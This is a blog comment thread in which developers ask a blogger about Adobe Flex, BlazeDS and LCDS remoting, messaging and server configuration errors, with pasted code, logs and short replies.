Also please advise me, is it possible to hide the components such as panel and other components and they should be shown on particular event occurance.
Please help me
Thank you
Hi Sujith,
I found lot of useful posts in your blog. I am looking for some help in developing a Flex Project.
Here’s my requirement:
Dashboard needs to be displayed with the data from MySql database which gets updated every 10 min. That is..my dashboard charts have to be refreshed every 10 min. Please suggest me how to start this project. Any hints/sample code is highly appreciated.
Thanks,
Mona.
contd..
I am planning to use Java as backend and JBoss server to deploy my application. Step by step walk through will be very helpful. Looking forward for your reply.
Thanks,
Mona.
Hi Ganesh,
Please check the visible property of the Flex controls and modules in Flex.
Hi Mona,
Couple of options
1. Data Management feature in LCDS has this and more implemented. If you can use LCDS, then go for it.
2. Have a timer and send request to the server to get data the modified data
3. Use one of the polling channels in BlazeDS Messaging service and get the modified data
Useful articles
Hope this helps.
Hi Sujit,
How can i put blazeDs, My SQL and flex together.
Is there any way?
Please help
Prachi
Hi Prachi,
You should have a Java class, which communicates with MySQL. Flex should communicate with Java class using Remoting in BlazeDS. Please check the articles in the URL below.
Hope this helps.
Hi Sujith,
Thanks for the reply. I am unable to configure JBoss server as target runtime in Flex Builder.
I am getting this error:
Missing classpath entry \your_server_root\appservers\jboss\bin\run.jar
I have seen a lot of posts similar to this error but could not find a solution.
-Mona
Sujith,
A simple application demonstrating interaction between Flex, Java and MySQL would be very helpful. Please post if you have such applications.
Thanks.
i have tried using java class for connecting blazeds to mySQL but still faing the problem,
Can you pelase put together a simple app which demonstrates interaction between Flex, Java and MySQL . It will be really very helpful
Will your Blazemonster utility work with LCDS as well? Thanks.
Have you used Blazemonster with the Swiz framework? If so can you write a blog entry indicating how the two work together? This would seem to be a very time-saving combination but I’m not yet sure how it would work, being new to Flex.
Sujit,
Is there a way to display PDF in a Flex Web App like the PDFs displayed in acrobat.com… We don want to use iFrames. Pleae reply….
Hi Sujit,
In Flex , Is it possible to mashup other site components ie gagdets in my flex program (or in Accordion).
It can be like news/ chat / currency codes/ Exchange rates etc).
If possible point to me links available with example (flex examples).
Thanks in Advance,
Regards,
Srini.
HI Sujit,
Have posted one query on usergroup. Can you quickily take a look and provide your input ?
It is about using HTTPService to send POST request to https URL
Thanks ,
Nilesh
Hi Sujit,
Could explain me the clear picture of life Cycle methods of a application as well as child creation process with an examle???
Hi Sujit,
Could explain me the clear picture of life Cycle methods of a application as well as child creation process with an example???
Hi Phil,
Yes it will work, please let me know if you face any problem.
Thanks.
Hi Mahesh,
I don’t this is possible as of now.
Hope this helps.
Hi Srinivas,
It is definitely possible, just consume the services you want using WebService or HTTPService components and display them in your Flex application.
Hope this helps.
Hi Sujit,
I want to create a page with Adobe Flex where few user can login in a same session.
For example to chat or to see each other via webcam.
How can I realize this?
The page is already working, but every user have an other session…
Can you give me a hint?
best regars
tobi
Hi Sujith,
I am trying to run example using flex 4 and blazeds.
I am receiving error when I press the button:
[MessagingError message=’Destination ‘CreatingRpc’ either does not exist or the destination has no channels defined (and the application does not define any default channels.)’]
What is the source for this problem ?
How can it be debug ?
Thanks
Hi Sujit,
I am using the Google Calendar API created by you. I am facing two problems while using that:
1. Firstly if I try to delete an event I get this error:
ArgumentError: Error #2008: Parameter method must be one of the accepted values.
Debugging the error gave me some idea that it was coming at:
urlRequest.method = “DELETE”;
Any idea on how to rectify it?
2. Second error is when I try to get events between a given date range. The problem is that the date gets converted to UTC format in ur API and if I try to get events for a single day, i get in result for 2 days.
Would appreciate if you could help me out..
Thanks
Hi Sujit!
I wish you will answer my question.
Iam doing project which use combine Flex, Stomp, ActiveMQ. How can I send message from Flex client to topic of ActiveMQ. I import as3-stomp before. What do I must import packages more?
Thanks!
– chary –
Hello to all
I’ AM PROGRAMING WITH ADOBE FLEX AND I’AM GETTING A MESSAGE, PLEASE HELP ME
Hi Sujit…
i keep getting this error in LCDS…
“HttpSession to FlexSession map not created in message broker”
I have clustered my LCDS Server(on TomcatB) with another Tomcat Server(TomcatA).
What am i doing wrong…
Thanks.
Hi Sujit,
I want to integrate Flex and BlazeDS with my Struts framework using remote object.
I am able to get the parameters from Flex client to my remote method as arguments.
But I was earlier using forms to get these parameters and used that form object at many places to update my application.How can these be achieved in Flex ?
It would be of great help if you could reply with a sample application integrating Struts with Flex and BlazeDS.
Thanks in advance,
Lalit.
I want to integrate mathmleditor in flex application,
i have seen the google code which uses javascript and html and mylib.swc. I tried the same code alongwith the swf file and loaded the same swf as a url
Hi,
I just want to ask if its possible to create xml file and save the data in my form in flex or air?
Hi Sujit,
Please can you tell me how i can access Java methods from Adobe Air Appilcation?
Hi Sujit,
As per my understanding ,Flex is not supporting Map DataType(HashMap/Map). So i wrote the below class to use Map in my application.
The problem i am facing with doing this is, I am not able to bind my map with the ‘currentState’ property of a “Canvas”. The Class which i have written extends the ArrayCollection but still i am facing issues with binding.
My Map class which extends ArrayCollection:
package com.util
{
import mx.collections.ArrayCollection;
public class Map extends ArrayCollection
{
private var keyNames:Object = new Object();
public function Map()
{
super();
}
public function put(key:String,value:Object):void
{
if(keyNames.hasOwnProperty(key))
{
setItemAt(value,keyNames[key]);
}
else
{
keyNames[key] = this.length;
addItem(value);
}
}
public function getValue(key:String):Object
{
return getItemAt(keyNames[key]);
}
}
}
My MXML:
It would be of great help to me, if you could post a solution.
Thanks
Prashanth
Hi Sujit,
Thanks for all the great postings.
Could you please provide an example for Data Paging in Fash Builder4 with Java?
Thanks
Hi,
I am trying to load a file that is locally on my computer.
I am receiving the following error:
SecurityError: Error #2148: SWF file cannot access local resource. Only local-with-filesystem and trusted local SWF files may access local resources.
at flash.net::URLStream/load()
I try to add to add to the compiler the option of -use-network=false but it didn’t help.
I am using flex 4.
I also add the the file and directory to the trusted list.
can you help with that ?
Thanks
Dear Sujit,
I have created a RIA using Flex 3 and WebORB PHP. It successfully runs on MAMP on Mac using the localhost. But how the heck do I deploy this to my hosted website? There’s nothing to be found on how to setup WebORB PHP on a hosted website. Could you give me some hints regarding this issue? Btw, I am using the Community Edition. I would be very glad.
Hi Sujit,
I am using flex 3 and blazeds for web application development. I have following questions and any help is appreciated.
1. Do we have to do any session handling in flex based web app?
2. Can you please explain how to handle the server session expire event in client side and display login page?
Thanks
i have actionscript classes to parse mathml but i dont know how to access them using html and javascript. I want to send xml data and want to get parsed mathequation.please help.
Hi Sujit,
I want to create a simple application which would require a database at the backend. I am using Flex Builder 3 to make the application. Can you please suggest a light backend database for this. Is it possible to use MS Access.
Thanks in Advance.
Pooja <>/lcds-sample/ (I have appropriate destinations configured in data-management-config.xml) i am able to get the data from my owm backend. If i point the Root folder to <>// i am getting “No destination….” error eventhough i have proper destination configured.
Thanks in Advance,
Rao -app root-/lcds-sample/ (I have appropriate destinations configured in data-management-config.xml) i am able to get the data from my owm backend. If i point the Root folder to -app root-/myapplication/ i am getting “No destination….” error eventhough i have proper destination configured.
Thanks in Advance,
Rao
Hi Sujit,
I need help from you regarding server console printing. As I am using blazeds for remote call for server side java classes. Everything is working fine. I have deployed my application on JBOSS server. Whenever I use to call remote classes there are few thing that is getting printed on server console. I have checked in my application that if I am using any system.out.println inside java class. But that is also not the case. I want to stop printing of those information on server console. Please help me regarding this.
Thanks in advance,
Ravi
Hi ,
Sujith,
Iam having problem with my application. Iam connecting flex to struts to mysql. It is hanging in between after 3-4 records are added into the database. Iam not able to understand whether it is java problem or tomcat problem or flex problem pls do help me in this regard. waiting for your reply. You can send it to my personal mail id too.
pls its urgent.
Hi,Iam need information on FLEX HTTP request.
I dont want to hard code URL in .
So iam configuring in proxy-config.xml file.
Iam unable to communicate with this file.Iam using Blaze ds.
Let me know if u have any ideas
MessagingError message=’Destination ‘ProxyRequest’ either does not exist or the destination has no channels defined (and the application does not define any default channels.)’]” faultCode=”InvokeFailed” faultDetail=”Couldn’t establish a connection to ‘ProxyRequest’
Getting this error…
Hi, Iam using Blazeds with Tomcat.
Making a Http service request from Flex client
I have configured destination in proxy-config.xml file.
/{context.root}/test
Error iam getting on submit is :[RPC Fault faultString=”[MessagingError message=’Destination ‘ProxyRequest’ either does not exist or the destination has no channels defined (and the application does not define any default channels.)’]” faultCode=”InvokeFailed” faultDetail=”Couldn’t establish a connection to ‘ProxyRequest'”]
at mx.rpc::AbstractInvoker/[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\rpc\AbstractInvoker.as:263]
at mx.rpc.http.mxml::HTTPService/[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\rpc\http\mxml\HTTPService.as:249]
at mx.rpc.http::HTTPService/send()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\rpc\http\HTTPService.as:767]
at mx.rpc.http.mxml::HTTPService/send()[C:\autobuild\3.2.0\frameworks\projects\rpc\src\mx\rpc\http\mxml\HTTPService.as:232]
at FlexHttpServiceDemo/___FlexHttpServiceDemo_Button1_click()[E:\home\isms\eclipseWorkSpace\FlexHttpServiceDemo\src\FlexHttpServiceDemo.mxml:24]
Hi Tobi,
You can try Messaging service BlazeDS/LCDS or try one of the below
Hope this helps.
Hi ishai,
This might because either the destination doesn’t have any channel defined or Flex application is not recompiled after configuring the channel. You can check the channel used by the RemoteObject by just putting a break point and watching the RemoteObject instance variable.
Hope this helps.
Hi Rahul,
Which Flex SDK are you using ?
Hi Jose,
Whats the message you are getting ?
Hi Lalit,
Please check the articles below.
Hope this helps.
Hi Richard,
Yes, definitely. Please see if this article helps
Hi Sachin,
Please check this article
Hope this helps.
Hi Prashanth,
Did you send out same question to Vyshak ? If yes, I replied to your email.
Hope that helped.
Hi Vimal,
I will try posting that. But its same as PHP except that the code on the server is written in Java. Please try and see if you can get that working.
Hi ishai,
Please change the output folder/ launch URL to launch it from local system rather than from the server. swf loaded from a server cannot access local file system.
Hi Tobias,
You should be changing the endpoint URLs in your services-config.xml file to point to your hosted website and the Flex application has to be recompiled with the updated services-config.xml configuration file. That change should be sufficient to deploy.
Hope this helps.
Hi Cham,
You can find details on how to manage session using Remoting at this URL
Incase of session expiring, you should be writing code which will check if the session has expired and let your Flex application know about that. You can also handle the same on the client. Please find details at this URL
Hope this helps
Hi Kanti,
Please check if this helps
Hi Pooja,
You can use database of your choice as long as there are driver to communicate with the database. I would use chose MySQL over MS Access 🙂
Hope this helps.
Hi Rao,
Can you please share the data-management-config.xml and the web.xml. If you can also share the Flash Builder error logs that will help. Thanks.
Hi Ravi,
Please change the log settings in services-config.xml
Hope this helps.
Hi Raja,
Where is this proxy-config.xml file ?
Hi Raja,
Please make sure you have recompiled your Flex application after changing proxy-config.xml file. Safe side, run clean command on your Flex project.
Hope this helps.
I have been battling with this problem for the last few days so could really do with some help 🙂
I have a Flex3 app using Blazeds to recieve messages being pushed from a Web App on a Tomcat server – the app on the server is working fine and can see things working as I expect. I consistently get the error message “The Destination [“alarm-event-feed”]either does not exist or the destination has no channels defined” when I try to run the Flex3 app.
I’ve attached the config files from the Tomcat server – can anyone help??
Iam using flex http service with use proxy=true,destination = “destination”…
Hi Sujit,
I have gone through ur “Building Flex application for BlazeDS Remoting destinations using Flash Builder 4”. i have created destinations but still i am not able to see any destinations list in BlazeDS wizard(in DCD). i am able to access the destination using RemoteObject Call. Can u plz help me out
And While connecting BlazeDS it is asking me tomcat Username and password if i give wrong password also it is allowing me to enter inside is there any prob in tomcat
Thanks
Vijay Kumar J
Hi,
Iam working on Flex Spring Integration.
In flex iam using Http Service.
Please let me know the configuration for Application-config.xml file in Spring to work on FLEX-Spring Integration.
Hi i am able to use php to access my locally created db and view the datas, but i have sql there in usa and now wanted to view the datas i.e bind the datas and see it.
I am able to connect in xl using connect database and give the database name which looks like this
usaicf.usa.website.com\sql2005
have username and password and know the table name
if i use the usaicf.usa.website.com\sql2005 in xl i am getting the query datas but if i do the same in flexbuilder4 it throws a error which says it could not connect no such host is known.. but the same is connected through xcel please help me…
its through vpn network..
We are looking at utsourcing the development of some RIA components. Can you recommend some of the top players in RIA and Flex development in India?
Thank you
David
Hi,
I am using the MessageBroker code to send a message from Java to the client. It works perfectly fine when the application and blazeds server run from the same tomcat instance but if i change the blazeds server the message sent from java is not received by the client. Any help would be fine.
Thanks
Hi Vijay,
Can you please send me the remoting-config.xml file, screen shot of the of the destinations displaying window in FB4 and the FB4 error log. Regarding destination being accessible even if you enter wrong user name password, are you using custom or basic authentication? Also please make sure your authentication logic is fine.
Hope this helps.
Hi Suman,
Please check out article at this URL
Hope this helps.
Hi Suresh,
Please check article at this URL
Hope this helps.
Hi David,
Please see if this link helps. If you cannot find any kindly let me know.
Hi Kaushal,
As long as your Java class sending the message and the BlazeDS are on the same tomcat instance this should be working. Can you please check if normal messaging using Flex application as the message producer is working fine.
Hi,
Is it possible to have flex web application on server located in one place and have proxy servers located in different location(countries) so when user enter my url server he will get the data (if exists) from the local server and if not exists the local server will be update from the main server.
In any case the main server is update with changes the client should be updated.
If that possible how can I do that ?
Thanks
Hi Sujit
I have some questions can u plz answers them ThankQ in advance
1) When we are using RemoteObject then request will be sent in Binary format and while using HttpService or WebService request will be in xml format is it correct?.
2) Is there any encryption and decryption method of request and response ?
3) what is difference b/w Polling and Streaming in BlazeDS? is there any other type available?
4) what concept comes under FDMS and Messaging Service.
DataPush like producer, consumer and DataService comes under FDMS then what is Messaging Service?
5) RPC Service is nothing but HttpService , WebService and RemoteObject is it true?
I know how to use them but i what to know what happens internally.
Plz help me out, i am getting conflict about this Questions.
Hi Sujit
I have some question can u plz answers them
1) Is there any Encryption and Decryption technology will sending request/response from Server.
2) RPC calls means RemoteObject, HttpService and WebService is it true?
3) Genearlly they are FDMS and Messaging Service.
FDMS is used for Serialization b/w Server and Client and b/w clients like Producer, consmer and DataService is i am write? then what are Messaging Service?
4) if we are Using RemoteObject then request is send in format of AMF(Binary) and while using HTTPService or WebService request is send in xml format is i am Write?.
Accourding BlazeDS AMF Channel send request in AMF (Binary) and HTTP Channel in XML is i am Write?.
Plz Help me out in this conflict
Thanks
Vijay Kumar J
Hi Sujit,
Flex application being the producer works perfectly fine with blazeds on a different server. Flex to Flex communication also works perfectly fine but java sending out the message, java does send out the message but we are unable to find where it is going or which client is receiving….
Hi Sujit,
I am working on Flex with Coldfusion. I am trying to get knowledge on LCDS/Blazeds. I have few doubts in my mind. It would be nice if u can help me please.
1. I have used Flex Remoteobject to call Coldfusion CFC to Read/Update/Delete process on MS SQL Server DB for our application. I was not using LCDS. But now i am using LCDS and its charts says that LCDS has RemoteObject. What is the difference between the first RemoteObject and LCDS RemoteObject ?
2. Is Messaging Service in LCDS and BlazeDs is Same ? Is BlazeDs is a subSet of LCDS ?
3. I am trying a simple chat application with Producer/Consumer approach. But it is throwing error.
“Channel.Connect.Failed error NetConnection.Call.Failed: HTTP: Status 405: url: ‘”
Content of messaging-config.xml
0
1000
false
Please help!!!!
Vikash
Thanks,
Vikash
Hi Sujit,
I am interested in using your BlazeMonster tool for its Java to AS capability. However, I can’t seem to find any license information about it. Can you please publish a page with license information about your projects? I love what you have done and the tool works great, but unfortunately I cannot proceed without knowing what type of license the project is under. Thanks!
-Ryan
Hello Sujit, I attended the first day of your Flex boot camp at MA College of Engg,Kothamangalam,Kerala. I liked the FlashAhead web site vert much. But one thing I would like to know is about Search Engine Optimization (SEO) of Flex sites. Coz when I view the site source, it shows just an swf embedded and I think it don’t help from the SEO perspective. So can we do SEO with flex??
Also see this
Hi,
I’m playing around with the zend framework (zf) and flash builder 4 (fb4), and I’m a bit lost, i read about the new features in the fb4 for connecting with data, so i configure a new zf project, with a virtual host ().
I followed the structure recommended on the zf site having the library 1 level behind the public_html folder, create some controlers, default, admin, and service, the default launch the flex app, the admin is serving HTML and javascript, and the services is my messageBroker, where i start the Zend_Amf_Server.
The problems came when i try setup the data services in fb4. i cant get to the services controller.
In the URL i specify
where services is the name of the controller and amf is the Action where i start the Zend_amf_server, and use the addDirectory() function to specify the “services” folder under /application/services.
but i cant get it to load the services in fb4.
In the file field on fb4 data services wizard i select the index.php on public_html sence it reroutes the requests to the services controler, and amf action.
But it doesn’t work, my objective is to use the all zf as a server platform, and flash(flex) on the client side for the front-end, and zf and xhtml+ajax on the backend.
how can i do this? Can you give me some lights?
Thanks
Hi sujit,
Thank you very much for your reply for my earlier post.I’m using flex 3, java, blazeds and spring framework for web application development.
I’m handling session expire event in java side and flex side in following way.
I’m setting a sessionId session attribute in flex session once user login to the system. It is done in a java class following way.
FlexSession session= FlexContext.getFlexSession();
session.setAttribute(“sessionId”, session.getId());
Then in each remote call I’m checking the session id as in following code.
if((session.getAttribute(“sessionId”)==null) || session.getAttribute(“sessionId”)!=session.getId()){
throw new Exception(“no session”);
}
If session attribute is null or stored session id is not equal to current session, exception is thrown.
I’m catching this exception at flex client side within the fault result handler of remote object call and displaying the login page.
public function userListFaultHandler(event:FaultEvent):void{
if(event.fault.faultString==”no session”){
//shows the login page
Application.application.showLoginView();
}
}
Can you see any issues or cons in this approach?
Thanks
Hi);
Messaging-config.xml
<!– –>
15
Services-config.xml
false
true
false
true
1
[BlazeDS]
false
false
false
false
Endpoint.*
Service.*
Configuration
false
Any pointers are highly appreciated.
thanks
ilikeflex
Doing repost… message-time-to-live in the desination properties);
and i am amf poling to get the messages.
Thanks
ilikeflex
Thank you so much for your excellent work and support. I recently decided to take out WebORB and replace it with BlazeDS and BlazeMonster-generated code. I’m under the gun for a demo to sell Flex to my management.
I noticed that with BlazeDS/Monster-generated code, all collections are ArrayCollections, rather than Arrays by default with WebORB. I have a complex (deeply nested and circular) object model and I need to fetch large record sets to the client. When I switched to the Blaze solution, I noticed a considerable slow down in performance.
My questions is, can I make Blaze send only Arrays (and make the corresponding changes in the generated VO’s), and then just convert to ArrayCollections on the client when/if needed. I suspect this will recover the performance hit I took by switching. I can easily fix up the generated VO code, but how do I force BlazeDS to send only generic arrays? Is there a setting somewhere?
Thanks again for your generous support to the Flex community.
John K.
hi Sujit,
I have to traverse an xml tree and build an object(for instance Map) that shows the parent and the children as a collection( parent id – collection). My xml is similar to this.
I should have properties of the node as object properties. What is the best way to do this?
Thanks.
Hi Sujit,
I want to pass custom properties like host and port to a java class specified in remoting-config.xml.
I tried something like this,
com.selectica.javaapi.CxJavaAPI
localhost
7000
but i am getting an error like
**** MessageBrokerServlet failed to initialize due to runtime exception: Exception: flex.messaging.config.ConfigurationException: Unrecognized tag found in . Please consult the documentation to determine if the tag is invalid or belongs inside of a different tag:
‘/remote-host’ in destination with id: ‘CxJavaAPI’ from file: remoting-config.xml
‘/remote-port’ in destination with id: ‘CxJavaAPI’ from file: remoting-config.xml
Now in this case actually my class CxJavaAPI has a constructor which needs the host and port .Is it possible to achieve this? If yes please let me know.
Thanks in advance,
Sayali
Hi Sujit,
I wanted to how we can get the method name of a RemoteObject that has invoked a particular handler?
At present I have a RemoteObject with various methods all using the same handler on result, I just wish to ‘switch’ the actions based on which method invokes the handler.
Hi Sujith Reddy,
Could you plz post one article on flex profiling.
Hi Sujit,
I am having a flex application with BlazeDS and Remote Objects are used to perform the business logic. The remote object also creates a RMI client object and communicates with the RMI server which inturn performs some DB operations.
After approximately 30 seconds the AMF channel disconnects with a Fault while the backend is still working. The AMF is simple AMF.
I have tried setting the requestTimeout=0 and also -1 on the remote objects, but the result is same.
Any help is much appreciated.
Thanks in advance.
Regards,
Latha
Channel definition
———————–
–
–
–
false
false
–
–
false
–
–
true
4
———————————————-
remoting-config.xml
–
–
com.amat.raadmin.ui.service.ToolAccessManagement
application
——————————————-
Here is the log extract
———————————————
ToolAccessMngr.invokeToolMethod: Inside invokeToolMethod
‘8AFA707B-08A2-CA64-E772-4C5D7AE7D89A’ producer sending message ‘6F042089-0286-EE50-0244-4C5D8E70178F’
‘8AFA707B-08A2-CA64-E772-4C5D7AE7D89A’ producer connected.
‘8AFA707B-08A2-CA64-E772-4C5D7AE7D89A’ producer acknowledge of ‘6F042089-0286-EE50-0244-4C5D8E70178F’.)
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer set destination to ‘ToolAccessMngr’.
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer sending message connected.
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer sending message acknowledge of acknowledge of sending message ‘E48F33FF-38C7-8A6F-C67B-4C5E97FEFE56’
‘CF0DE17F-AB7F-E863-4537-4C5C61C36744’ producer channel faulted with Channel.Call.Failed NetConnection.Call.Failed: HTTP: Failed
‘8AFA707B-08A2-CA64-E772-4C5D7AE7D89A’ producer channel faulted with Channel.Call.Failed NetConnection.Call.Failed: HTTP: Failed
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer channel faulted with Channel.Call.Failed NetConnection.Call.Failed: HTTP: Failed
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer fault for ‘E48F33FF-38C7-8A6F-C67B-4C5E97FEFE56’.
[ChannelFaultEvent faultCode=”Channel.Call.Failed” faultString=”error” faultDetail=”NetConnection.Call.Failed: HTTP: Failed” channelId=”my-amf” type=”channelFault” bubbles=false cancelable=false eventPhase=2]
[ChannelFaultEvent faultCode=”Channel.Call.Failed” faultString=”error” faultDetail=”NetConnection.Call.Failed: HTTP: Failed” channelId=”my-amf” type=”channelFault” bubbles=false cancelable=false eventPhase=2]
NetConnection.Call.Failed: HTTP: Failed
NetConnection.Call.Failed: HTTP: Failed
ToolAccessMngr.invokeToolMethod: Inside invokeToolMethod
ToolAccessMngr.invokeToolMethod: Inside invokeToolMethodmy-amf’ channel sending message:
(mx.messaging.messages::RemotingMessage)#0
body = (Array)#1
clientId = “9E706DC1-2D0E-B462-81B5-51DE23E8F796”
destination = “ToolAccessMngr”
headers = (Object)#2
messageId = “8C4F889F-A2C9-0DC8-C43B-4C5F15892BD8”
operation = “returnToolDetails”
source = (null)
timestamp = 0
timeToLive = 0
‘my-amf’ channel polling stopped.
‘my-amf’ channel polling stopped.
‘my-amf’ channel disconnected.
‘my-amf’ channel disconnected.
‘my-amf’ channel has exhausted failover options and has reset to its primary endpoint.
‘my-amf’ channel has exhausted failover options and has reset to its primary endpoint.
‘my-amf’ channel endpoint set to
‘my-amf’ channel endpoint set to
‘CF0DE17F-AB7F-E863-4537-4C5C61C36744’ producer channel disconnected.
‘CF0DE17F-AB7F-E863-4537-4C5C61C36744’ producer channel disconnected.
‘8AFA707B-08A2-CA64-E772-4C5D7AE7D89A’ producer channel disconnected.
‘8AFA707B-08A2-CA64-E772-4C5D7AE7D89A’ producer channel disconnected.
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer channel disconnected.
‘DA76AE26-93A4-F6EA-57C7-4C5E0D1EB1FF’ producer channel disconnected.’.
Hi Sujit,
In my previous post, the xml tags are missing. Please find them here.
Thank you.
Channel definition:
————————–
–
–
–
false
false
–
–
false
–
–
true
4
———————————————-
remoting-config.xml
—————————————-
–
–
com.amat.raadmin.ui.service.ToolAccessManagement
application
——————————————-
Hi Sujit,
The problem of channel disconnect got resolved. It was mistake from our side. We were not using the AIR SDK for Linux, but were using the one for Windows.
Sorry for any inconveniences.
Thanks,
Latha
Morning Sujit,
I have a problem with the new FB4. I would like to use the generated php wizard but cannot filter the datagrid using filter functions?
Basically I was working on an date range filter that can filter the data in the datagrid connected to the mysql DB. I can only get it to work if I hard code the whole project and use arraycollections in the main application.
Please could you create an example that uses dates and applies a range filter in flash builder 4…it would be a massive help?
Thank you
RDB.
Hi Sujit, I have a question related to Flex 3 and ColdFusion that it might be simple to answer but I have been struggling with it for a while.
I need to create a Flex application to use with ColdFusion and although this is a simple procedure when we are creating the project in a computer where you have ColdFusion installed locally (as all books shows examples of it), but what if the ColdFusion server is installed in another machine in the network?
My current situation is the following:
– I have Flex Builder 3 install in my PC at work and its workspace is in a folder in the network outside of my PC.
– We have a server (ISWEB1) partition in two drives; C, where the ColdFusion 8 is installed and D where all the files the developers work with reside. The ColdFusion installation runs in a server where IIS is used as the web server.
– I have the drive D on the server ISWEB1 mapped to one of my letter drives and can access it easily
– The drive C on the Server can only be accessed remotely (or through the web to access the ColdFusion admin page) and is not exposed to the network as drive D is.
My problem is, I need to create a Flex 3 application that uses ColdFusion using remote object access service (CF Flash Remoting) but I wanted to point to the installation version on the server ISWEB1 and not to the one installed locally. The Configure ColdFusion Server screen in the Flex Builder asked me for the location of ColdFusion root folder, Web root, and root URL. There is no way I can point to the server (ISWEB1)where ColdFusion is installed as those fields seem to required a address that points to a local install or a mapping on that local server.
So how can I go about to create a project in Flex that uses ColdFusion that is not installed locally? The work around that could be used is to use the ColdFusion developers edition I have installed locally and use during the creation of the project in Flex Builder, but then I would have to have all the same data sources, mappings, and CFCs in my the local server in order to test, which seems double work. To aggravate that when you try to test the application Flex writes the files to the local server and unless you have everything available locally it would not work properly. I am trying to avoid duplicating the work.
Hi Sujit,
I am seeking some input about session authorization. I am assigned with the task of authenticating against a mysql data table. A userName,userPassword challenge. The development tools are Flex 4, LCDS 3 B2. Is the fiber model able to handle these request, and if so can you recommend a place to start researching or would the Spring framework be better suited for this type of task?
Thank you
Hi
I am using Blazeds-3.2.0.3978 amd Weblogic 10.0.0.1. I have the session timeout
for 5 minutes.
Below is channel definition i am using
true
1
I have declared destination as
120000
Doing Repost
Hi
I am using Blazeds-3.2.0.3978 amd Weblogic 10.0.0.1. I have the session timeout
for 5 minutes.
Below is channel definition i am using
channel-definition id=”my-polling-amf”
class=”mx.messaging.channels.AMFChannel”
endpoint
url=”http://{server.name}:{server.port}/{context.root}/messagebroker/amfpolling”
class=”flex.messaging.endpoints.AMFEndpoint”/
properties
polling-enabledtrue/polling-enabled
polling-interval-seconds1/polling-interval-seconds
/properties
/channel-definition
I have declared destination as
destination id=”destICL”
adapter ref=”actionscript” /
properties
server
message-time-to-live120000/message-time-to-live
/server
/properties
/destination
I am sorry it is 3000 messages per minute and not second.
Thanks
ilikeflex
Hello.
building-a-database-based-app-using-flex-and-php-with-flash-builder-4.
How does that relate to two tables?
are you ace in Flex3 with Air?
Hi sujith,
I want to develop a sample application using java and flex, which contains jus two screens first contains the link for the second and the second one contains the results fetched from a data base. can you please assist me, as im new to flex…..
Hi Sujit,
I am having a AIR application on linux system. I am facing a channel fault after >~30secs when installed as a package using adt. While it works fine when we use ‘adl’ to run the application. I am using linux air sdk for both adl and adt, but the mxml is compiled on windows platform. Can you please provide any pointers on what could be causing the problem.
Thanks in advance,
Latha
I have developed the dashboard in my application using flex 3.0. For this I have used JSP wrapper around the flex application. My application runs on JBoss application server. for communication between flex app and my application I am using LCDS. HTTPService component is being used to receive data from the server. Channel definitions are given in service-config.xml for amf and http channels and for both secure secure and not secure mode. In my proxy-config.xml I have defined Channels and destinations.
In my development environment both secure and non secure mode were working fine. Now when I have deployed it behind the hardware load balancer(which accepts secure requests only and if the request is not secure it redirects it to secure url) there is no response from the message broker servlet. One thing more I have observed is when the environment is non load balanced there are request like ‘http://{server.name}:{server.port}/{context.root}/messagebroker/http’. and these requests are post request. But in load balanced environment with ssl the request is again like ‘http://{server.name}:{server.port}/{context.root}/messagebroker/http’ which is a post request and it is redirected to ‘https://{server.name}:{server.port}/{context.root}/messagebroker/http’ which is a get request. The content returned by this get request is null.
services-config.xml
…
…
false
false
false
…
…
proxy-config.xml
…
…
…
…
/kr/servlet/DashboardServlet
/kr/krportal/dashboardJSPService.jsf
…
…
Looking for some comments
Thanks
Abhishek Gupta
Hello;
I am new to Adobe Flex; I am playing around Adobe flex dashboard . I have managed to customize some of the panels (PODs), I am trying to have one of the panels to show pdf document, I used IFrame method I managed to have the SWF file configured and can show the Loading Icon shown, but I could not managed to pass the PDF document to the panel through podContentBase.as:
/*
* Base class for pod content.
*/
package com.esria.samples.dashboard.view
{
import flash.xml.XMLNode;
import mx.containers.VBox;
import mx.controls.Alert;
import mx.events.FlexEvent;
import mx.rpc.events.FaultEvent;
import mx.rpc.events.ResultEvent;
import mx.rpc.http.HTTPService;
import mx.utils.ObjectProxy;
import mx.events.IndexChangedEvent;
import flash.external.ExternalInterface;
import flash.geom.Point;
import flash.net.navigateToURL;
public class PodContentBase extends VBox
{
[Bindable]
public var properties:XML; // Properties are from pods.xml.
function PodContentBase()
{
super();
percentWidth = 100;
percentHeight = 100;
addEventListener(FlexEvent.CREATION_COMPLETE, onCreationComplete);
}
private function onCreationComplete(e:FlexEvent):void
{
// Load the data source.
var httpService:HTTPService = new HTTPService();
httpService.url = properties.@dataSource;
if (httpService.url != “”) {
httpService.resultFormat = “e4x”;
httpService.addEventListener(ResultEvent.RESULT, onResultHttpService);
httpService.send();
}
else {
httpService.addEventListener(ResultEvent.RESULT, onResultHttpService);
httpService.send();
}
}
private function onFaultHttpService(e:FaultEvent):void
{
Alert.show(“Unable to load datasource, ” + properties.@dataSource + “.”);
}
// abstract.
protected function onResultHttpService(e:ResultEvent):void {}
// Converts XML attributes in an XMLList to an Array.
protected function xmlListToObjectArray(xmlList:XMLList):Array
{
var a:Array = new Array();
for each(var xml:XML in xmlList)
{
var attributes:XMLList = xml.attributes();
var o:Object = new Object();
for each (var attribute:XML in attributes)
{
var nodeName:String = attribute.name().toString();
var value:*;
if (nodeName == “date”)
{
var date:Date = new Date();
date.setTime(Number(attribute.toString()));
value = date;
}
else
{
value = attribute.toString();
}
o[nodeName] = value;
}
a.push(new ObjectProxy(o));
}
return a;
}
// Dispatches an event when the ViewStack index changes, which triggers a state save.
// ViewStacks are only in ChartContent and FormContent.
protected function dispatchViewStackChange(newIndex:Number):void
{
dispatchEvent(new IndexChangedEvent(IndexChangedEvent.CHANGE, true, false, null, -1, newIndex));
}
}
}
I am using the Dashboard as a training session for me, can you please help me on this.
Regards
Khalid Almansour
Hello Sujit;
I am new to Adobe Flex, can I use Flex to access MS Access tables, if yes can you please help me.
Regards
Khalid Almansour
Hi Sujit;
